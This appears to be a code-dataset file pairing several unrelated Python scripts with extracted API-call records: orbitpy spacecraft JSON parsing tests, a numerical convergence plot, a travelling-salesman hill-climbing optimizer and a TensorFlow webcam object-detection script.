"volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":"abc"}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":"abc"}\'\n )\n', (8765, 8980), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((9019, 9255), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 10, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 10, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED", "@id": "abc"}, "@id":123}\'\n )\n', (9042, 9255), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((9373, 9595), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"}, "@id":123}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"}, "@id":123}\'\n )\n', (9396, 9595), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((9601, 9851), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "XYZ","xRotation":0,"yRotation":0,"zRotation":0}, "@id":123}"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "XYZ","xRotation":0,"yRotation":0,"zRotation":0}, "@id":123}\'\n )\n', (9624, 9851), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((9965, 9996), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['spc1_json'], {}), '(spc1_json)\n', (9985, 9996), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((10014, 10045), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['spc2_json'], {}), '(spc2_json)\n', (10034, 10045), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((10063, 10094), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['spc3_json'], {}), '(spc3_json)\n', (10083, 10094), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((13966, 13997), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['spc1_json'], {}), '(spc1_json)\n', (13986, 13997), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((14015, 14046), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['spc2_json'], {}), '(spc2_json)\n', (14035, 14046), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((14064, 14095), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['spc3_json'], {}), '(spc3_json)\n', (14084, 14095), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((22706, 24121), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['"""{"@id": "sp1", "name": "Mars", "spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }, "instrument": {"name": "Alpha", 
"mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, "numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, "orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} } }"""'], {}), '(\n \'{"@id": "sp1", "name": "Mars", "spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }, "instrument": {"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, "numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}, "orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} } }\'\n )\n', (22726, 24121), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((24174, 24956), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['"""{"@id": 12, "name": "Jupyter", "spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }, "orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} } }"""'], {}), '(\n \'{"@id": 12, "name": "Jupyter", "spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }, "orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} } }\'\n )\n', (24194, 24956), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((25047, 28682), 'orbitpy.util.Spacecraft.from_json', 'Spacecraft.from_json', (['"""{"name": "Saturn", "spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }, "instrument": [ { "name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, "numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor" }, { "name": "Beta", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "SINGLE_ROLL_ONLY", "A_rollMin":10, "A_rollMax":15}, 
"mode": [{"@id":101, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}} ], "numberDetectorRows":5, "numberDetectorCols":10, "@type":"Basic Sensor" }, { "name": "Gamma", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "fieldOfViewGeometry": {"shape": "RECTANGULAR", "angleHeight":5, "angleWidth":10 }, "maneuver":{"maneuverType": "Double_Roll_Only", "A_rollMin":10, "A_rollMax":15, "B_rollMin":-15, "B_rollMax":-10}, "mode": [{"@id":0, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}}, {"@id":1, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "SIDE_LOOK", "sideLookAngle": 25}}, { "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "SIDE_LOOK", "sideLookAngle": -25}} ], "numberDetectorRows":5, "numberDetectorCols":10, "@id": "bs3", "@type":"Basic Sensor" } ], "orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} } }"""'], {}), '(\n \'{"name": "Saturn", "spacecraftBus":{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }, "instrument": [ { "name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, "numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor" }, { "name": "Beta", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "SINGLE_ROLL_ONLY", "A_rollMin":10, "A_rollMax":15}, "mode": [{"@id":101, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}} ], "numberDetectorRows":5, "numberDetectorCols":10, "@type":"Basic Sensor" }, { "name": "Gamma", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "fieldOfViewGeometry": {"shape": "RECTANGULAR", "angleHeight":5, "angleWidth":10 }, "maneuver":{"maneuverType": "Double_Roll_Only", "A_rollMin":10, "A_rollMax":15, "B_rollMin":-15, "B_rollMax":-10}, "mode": [{"@id":0, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}}, {"@id":1, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "SIDE_LOOK", "sideLookAngle": 25}}, { "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "SIDE_LOOK", "sideLookAngle": -25}} ], "numberDetectorRows":5, "numberDetectorCols":10, "@id": "bs3", "@type":"Basic Sensor" } ], "orbitState": {"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25} } }\'\n )\n', (25067, 28682), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((2213, 2260), 'propcov.AbsoluteDate.fromJulianDate', 'propcov.AbsoluteDate.fromJulianDate', (['(2459270.75)'], {}), '(2459270.75)\n', (2248, 2260), False, 'import propcov\n'), ((2875, 2935), 'propcov.AbsoluteDate.fromGregorianDate', 'propcov.AbsoluteDate.fromGregorianDate', (['(2021)', '(2)', '(25)', '(6)', '(0)', '(0)'], {}), 
'(2021, 2, 25, 6, 0, 0)\n', (2913, 2935), False, 'import propcov\n'), ((5624, 5736), 'instrupy.util.Orientation.from_dict', 'Orientation.from_dict', (["{'referenceFrame': 'Nadir_pointing', 'convention': 'REF_FRAME_ALIGNED',\n '@id': 'abc'}"], {}), "({'referenceFrame': 'Nadir_pointing', 'convention':\n 'REF_FRAME_ALIGNED', '@id': 'abc'})\n", (5645, 5736), False, 'from instrupy.util import Orientation\n'), ((6100, 6198), 'instrupy.util.Orientation.from_dict', 'Orientation.from_dict', (["{'referenceFrame': 'Nadir_pointing', 'convention': 'REF_FRAME_ALIGNED'}"], {}), "({'referenceFrame': 'Nadir_pointing', 'convention':\n 'REF_FRAME_ALIGNED'})\n", (6121, 6198), False, 'from instrupy.util import Orientation\n'), ((6602, 6714), 'instrupy.util.Orientation.from_dict', 'Orientation.from_dict', (["{'referenceFrame': 'Nadir_pointing', 'convention': 'SIDE_LOOK',\n 'sideLookAngle': -10}"], {}), "({'referenceFrame': 'Nadir_pointing', 'convention':\n 'SIDE_LOOK', 'sideLookAngle': -10})\n", (6623, 6714), False, 'from instrupy.util import Orientation\n'), ((7161, 7316), 'instrupy.util.Orientation.from_dict', 'Orientation.from_dict', (["{'referenceFrame': 'EARTH_CENTERED_INERTIAL', 'convention': 'XYZ',\n 'xRotation': 10, 'yRotation': -10.4, 'zRotation': 20.78}"], {}), "({'referenceFrame': 'EARTH_CENTERED_INERTIAL',\n 'convention': 'XYZ', 'xRotation': 10, 'yRotation': -10.4, 'zRotation': \n 20.78})\n", (7182, 7316), False, 'from instrupy.util import Orientation\n'), ((10229, 10506), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }\'\n )\n', (10252, 10506), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((11204, 11535), 'orbitpy.util.OrbitState.from_json', 'OrbitState.from_json', (['"""{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}"""'], {}), '(\n \'{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}\'\n )\n', (11224, 11535), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((11697, 11974), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }\'\n )\n', (11720, 11974), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((12055, 12386), 'orbitpy.util.OrbitState.from_json', 'OrbitState.from_json', (['"""{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}"""'], {}), '(\n \'{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, 
"second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}\'\n )\n', (12075, 12386), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((12592, 12869), 'orbitpy.util.SpacecraftBus.from_json', 'SpacecraftBus.from_json', (['"""{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }"""'], {}), '(\n \'{"name": "BlueCanyon", "mass": 20, "volume": 0.5, "orientation":{"referenceFrame": "NADIR_POINTING", "convention": "REF_FRAME_ALIGNED"} }\'\n )\n', (12615, 12869), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((13546, 13877), 'orbitpy.util.OrbitState.from_json', 'OrbitState.from_json', (['"""{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}"""'], {}), '(\n \'{"date":{"@type":"GREGORIAN_UTC", "year":2021, "month":2, "day":25, "hour":6, "minute":0, "second":0}, "state":{"@type": "KEPLERIAN_EARTH_CENTERED_INERTIAL", "sma": 6878.137, "ecc": 0.001, "inc": 45, "raan": 35, "aop": 145, "ta": -25}}\'\n )\n', (13566, 13877), False, 'from orbitpy.util import OrbitState, SpacecraftBus, Spacecraft\n'), ((2334, 2382), 'propcov.Rvector6', 'propcov.Rvector6', (['[6878.137, 0, 0, 0, 7.6126, 0]'], {}), '([6878.137, 0, 0, 0, 7.6126, 0])\n', (2350, 2382), False, 'import propcov\n'), ((3026, 3040), 'numpy.deg2rad', 'np.deg2rad', (['(45)'], {}), '(45)\n', (3036, 3040), True, 'import numpy as np\n'), ((3042, 3056), 'numpy.deg2rad', 'np.deg2rad', (['(35)'], {}), '(35)\n', (3052, 3056), True, 'import numpy as np\n'), ((3058, 3073), 'numpy.deg2rad', 'np.deg2rad', (['(145)'], {}), '(145)\n', (3068, 3073), True, 'import numpy as np\n'), ((3075, 3090), 'numpy.deg2rad', 'np.deg2rad', (['(-25)'], {}), '(-25)\n', (3085, 3090), True, 'import numpy as np\n'), ((10545, 11161), 'instrupy.Instrument.from_json', 'Instrument.from_json', (['"""{"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, "numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}"""'], {}), '(\n \'{"name": "Alpha", "mass":10, "volume":12.45, "dataRate": 40, "bitsPerPixel": 8, "power": 12, "orientation": {"referenceFrame": "SC_BODY_FIXED", "convention": "REF_FRAME_ALIGNED"}, "fieldOfViewGeometry": {"shape": "CIRCULAR", "diameter":5 }, "maneuver":{"maneuverType": "CIRCULAR", "diameter":10}, "numberDetectorRows":5, "numberDetectorCols":10, "@id":"bs1", "@type":"Basic Sensor"}\'\n )\n', (10565, 11161), False, 'from instrupy import Instrument\n')]
|
import numpy as np
import matplotlib.pyplot as plt
#plt.rc('font', family='serif')
#plt.rc('text', usetex=True)
sol1err = np.fromfile('../out/sol1err')
sol2err = np.fromfile('../out/sol2err')
L2err = np.sqrt(sol2err**2 + sol1err**2)
h = np.fromfile('../out/h')
x = np.sort(h)
fig, ax = plt.subplots(1,1)
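# Overlay reference curves proportional to (\Delta t)^i for i = 1..9 in log-log space,
# each anchored at the first measured error, so the convergence order can be read off
# from which reference line the data points follow.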
for i in range(1,10):
hh = np.logspace(np.log10(min(h)), np.log10(max(h)), 2500)
b = np.log10(L2err[0]/(10**(i*np.log10(h[0]))))
y = 10**(i*np.log10(hh) + b)
mask = (y > min(L2err))
hh = hh[mask]
y = y[mask]
    ax.loglog(hh, y, ':', label=r'$\propto (\Delta t)^{%d}$' % i)
ax.text(min(hh), min(y), str(i), ha='right', va='bottom')
ax.loglog(h, L2err, 'k.', label='results')
ax.set_xlabel(r'step size $(\Delta t)$')
ax.set_ylabel('$l_2$ error')
ax.legend()
ax.set_title('Convergence Test')
plt.tight_layout()
plt.show()
|
[
"matplotlib.pyplot.tight_layout",
"matplotlib.pyplot.show",
"numpy.fromfile",
"numpy.sort",
"numpy.log10",
"matplotlib.pyplot.subplots",
"numpy.sqrt"
] |
[((124, 153), 'numpy.fromfile', 'np.fromfile', (['"""../out/sol1err"""'], {}), "('../out/sol1err')\n", (135, 153), True, 'import numpy as np\n'), ((164, 193), 'numpy.fromfile', 'np.fromfile', (['"""../out/sol2err"""'], {}), "('../out/sol2err')\n", (175, 193), True, 'import numpy as np\n'), ((202, 238), 'numpy.sqrt', 'np.sqrt', (['(sol2err ** 2 + sol1err ** 2)'], {}), '(sol2err ** 2 + sol1err ** 2)\n', (209, 238), True, 'import numpy as np\n'), ((239, 262), 'numpy.fromfile', 'np.fromfile', (['"""../out/h"""'], {}), "('../out/h')\n", (250, 262), True, 'import numpy as np\n'), ((267, 277), 'numpy.sort', 'np.sort', (['h'], {}), '(h)\n', (274, 277), True, 'import numpy as np\n'), ((289, 307), 'matplotlib.pyplot.subplots', 'plt.subplots', (['(1)', '(1)'], {}), '(1, 1)\n', (301, 307), True, 'import matplotlib.pyplot as plt\n'), ((826, 844), 'matplotlib.pyplot.tight_layout', 'plt.tight_layout', ([], {}), '()\n', (842, 844), True, 'import matplotlib.pyplot as plt\n'), ((845, 855), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (853, 855), True, 'import matplotlib.pyplot as plt\n'), ((460, 472), 'numpy.log10', 'np.log10', (['hh'], {}), '(hh)\n', (468, 472), True, 'import numpy as np\n'), ((427, 441), 'numpy.log10', 'np.log10', (['h[0]'], {}), '(h[0])\n', (435, 441), True, 'import numpy as np\n')]
|
import math
import random
import numpy
from tools import *
'''
Parametric Optimizers to search for optimal TSP solution.
Method 1: Stochastic Hill Climbing search
Method 2: Random Search - Used as benchmark
'''
# Initialize the population, a collection of paths
def createPath(m):
n = numpy.arange(1,m+1)
numpy.random.shuffle(n)
return n
# Perform a stochastic hill climbing search
def stochClimb(points,bound,inter):
p = len(points)
# ctr for fitness func. eval.
ctr = 0
# data taken at each i in inter
data = []
# best seen so far
maxfit = 0.0
while (ctr < bound):
# Path
v = createPath(p)
f = fitnessShort(v,points)
if (f > maxfit):
maxfit = f
ctr += 1
if (ctr in inter):
data.append(1.0/maxfit)
if (ctr >= bound):
return data
# Create swap indices
o = numpy.arange(v.size)
i = numpy.arange(v.size)
while (ctr < bound):
climbed = False
numpy.random.shuffle(o)
numpy.random.shuffle(i)
for x in range(o.size):
for y in range(i.size):
swap(v,o[x],i[y])
shot = fitnessShort(v,points)
ctr += 1
if (shot <= f):
swap(v,o[x],i[y])
else:
f = shot
climbed = True
if (ctr in inter):
if (shot > maxfit):
maxfit = shot
data.append(1.0/maxfit)
if (ctr >= bound):
return data
# If no improvement made, local optimum reached
# Return solution, otherwise keep trying to climb
if (not climbed):
break
else:
if (f > maxfit):
maxfit = f
# Perform a random search, used primarily for benchmarking
def randSearch(points,bound,inter):
p = len(points)
scores = []
best = 0.0
for x in range(1,bound+1):
z = createPath(p)
s = fitnessShort(z,points)
if (s > best):
best = s
if (x in inter):
scores.append(1.0/best)
return scores
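# Usage sketch (illustrative only): the exact format of `points` is an assumption --
# it is passed straight through to tools.fitnessShort, which the functions above treat
# as the fitness of a candidate path over an indexable collection of cities. `bound` is
# a budget of fitness evaluations and `inter` holds the evaluation counts at which the
# reciprocal of the best fitness seen so far (presumably the tour length) is recorded.
if __name__ == '__main__':
    # 20 hypothetical cities; coordinates drawn uniformly from the unit square.
    cities = [tuple(c) for c in numpy.random.rand(20, 2)]
    checkpoints = [100, 500, 1000]
    print('hill climbing:', stochClimb(cities, 1000, checkpoints))
    print('random search:', randSearch(cities, 1000, checkpoints))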
|
[
"numpy.arange",
"numpy.random.shuffle"
] |
[((290, 312), 'numpy.arange', 'numpy.arange', (['(1)', '(m + 1)'], {}), '(1, m + 1)\n', (302, 312), False, 'import numpy\n'), ((312, 335), 'numpy.random.shuffle', 'numpy.random.shuffle', (['n'], {}), '(n)\n', (332, 335), False, 'import numpy\n'), ((840, 860), 'numpy.arange', 'numpy.arange', (['v.size'], {}), '(v.size)\n', (852, 860), False, 'import numpy\n'), ((869, 889), 'numpy.arange', 'numpy.arange', (['v.size'], {}), '(v.size)\n', (881, 889), False, 'import numpy\n'), ((943, 966), 'numpy.random.shuffle', 'numpy.random.shuffle', (['o'], {}), '(o)\n', (963, 966), False, 'import numpy\n'), ((973, 996), 'numpy.random.shuffle', 'numpy.random.shuffle', (['i'], {}), '(i)\n', (993, 996), False, 'import numpy\n')]
|
import cv2
import numpy as np
import os
# import six.moves.urllib as urllib
import sys
import tarfile
import tensorflow as tf
import zipfile
import pathlib
from collections import defaultdict
from io import StringIO
from matplotlib import pyplot as plt
from PIL import Image
from IPython.display import display
from object_detection.utils import ops as utils_ops
from object_detection.utils import label_map_util
from object_detection.utils import visualization_utils as vis_util
def load_model(model_name):
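    # NOTE: model_name is currently unused; the SavedModel directory below is hardcoded.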
model = tf.saved_model.load(
'/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/')
return model
PATH_TO_LABELS = '/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/labelmap.pbtxt'
category_index = label_map_util.create_category_index_from_labelmap(
PATH_TO_LABELS, use_display_name=True)
model_name = 'saved_model.pb'
detection_model = load_model(model_name)
def run_inference_for_single_image(model, image):
image = np.asarray(image)
# The input needs to be a tensor, convert it using `tf.convert_to_tensor`.
input_tensor = tf.convert_to_tensor(image)
# The model expects a batch of images, so add an axis with `tf.newaxis`.
input_tensor = input_tensor[tf.newaxis, ...]
# Run inference
model_fn = model.signatures['serving_default']
output_dict = model_fn(input_tensor)
# All outputs are batches tensors.
# Convert to numpy arrays, and take index [0] to remove the batch dimension.
# We're only interested in the first num_detections.
num_detections = int(output_dict.pop('num_detections'))
output_dict = {key: value[0, :num_detections].numpy()
for key, value in output_dict.items()}
output_dict['num_detections'] = num_detections
# detection_classes should be ints.
output_dict['detection_classes'] = output_dict['detection_classes'].astype(
np.int64)
# Handle models with masks:
if 'detection_masks' in output_dict:
# Reframe the the bbox mask to the image size.
detection_masks_reframed = utils_ops.reframe_box_masks_to_image_masks(
output_dict['detection_masks'], output_dict['detection_boxes'],
image.shape[0], image.shape[1])
detection_masks_reframed = tf.cast(detection_masks_reframed > 0.5,
tf.uint8)
output_dict['detection_masks_reframed'] = detection_masks_reframed.numpy()
return output_dict
def show_inference(model, frame):
# take the frame from webcam feed and convert that to array
image_np = np.array(frame)
# Actual detection.
output_dict = run_inference_for_single_image(model, image_np)
# Visualization of the results of a detection.
vis_util.visualize_boxes_and_labels_on_image_array(
image_np,
output_dict['detection_boxes'],
output_dict['detection_classes'],
output_dict['detection_scores'],
category_index,
instance_masks=output_dict.get('detection_masks_reframed', None),
use_normalized_coordinates=True,
line_thickness=2)
return(image_np)
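# Capture frames from the default webcam (device index 0) and run detection on each
# frame until 'q' is pressed.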
video_capture = cv2.VideoCapture(0)
while True:
# Capture frame-by-frame
re, frame = video_capture.read()
Imagenp = show_inference(detection_model, frame)
cv2.imshow('object detection', Imagenp)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
# cv2.resize(Imagenp, (800, 600))
|
[
"cv2.waitKey",
"tensorflow.convert_to_tensor",
"numpy.asarray",
"cv2.imshow",
"object_detection.utils.label_map_util.create_category_index_from_labelmap",
"cv2.VideoCapture",
"object_detection.utils.ops.reframe_box_masks_to_image_masks",
"tensorflow.cast",
"numpy.array",
"cv2.destroyAllWindows",
"tensorflow.saved_model.load"
] |
[((801, 894), 'object_detection.utils.label_map_util.create_category_index_from_labelmap', 'label_map_util.create_category_index_from_labelmap', (['PATH_TO_LABELS'], {'use_display_name': '(True)'}), '(PATH_TO_LABELS,\n use_display_name=True)\n', (851, 894), False, 'from object_detection.utils import label_map_util\n'), ((3196, 3215), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (3212, 3215), False, 'import cv2\n'), ((3471, 3494), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3492, 3494), False, 'import cv2\n'), ((522, 649), 'tensorflow.saved_model.load', 'tf.saved_model.load', (['"""/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/"""'], {}), "(\n '/home/bigpenguin/code/fyp_codes/eff_d0/research/object_detection/inference_graph2/saved_model/'\n )\n", (541, 649), True, 'import tensorflow as tf\n'), ((1032, 1049), 'numpy.asarray', 'np.asarray', (['image'], {}), '(image)\n', (1042, 1049), True, 'import numpy as np\n'), ((1148, 1175), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['image'], {}), '(image)\n', (1168, 1175), True, 'import tensorflow as tf\n'), ((2637, 2652), 'numpy.array', 'np.array', (['frame'], {}), '(frame)\n', (2645, 2652), True, 'import numpy as np\n'), ((3351, 3390), 'cv2.imshow', 'cv2.imshow', (['"""object detection"""', 'Imagenp'], {}), "('object detection', Imagenp)\n", (3361, 3390), False, 'import cv2\n'), ((2123, 2265), 'object_detection.utils.ops.reframe_box_masks_to_image_masks', 'utils_ops.reframe_box_masks_to_image_masks', (["output_dict['detection_masks']", "output_dict['detection_boxes']", 'image.shape[0]', 'image.shape[1]'], {}), "(output_dict['detection_masks'],\n 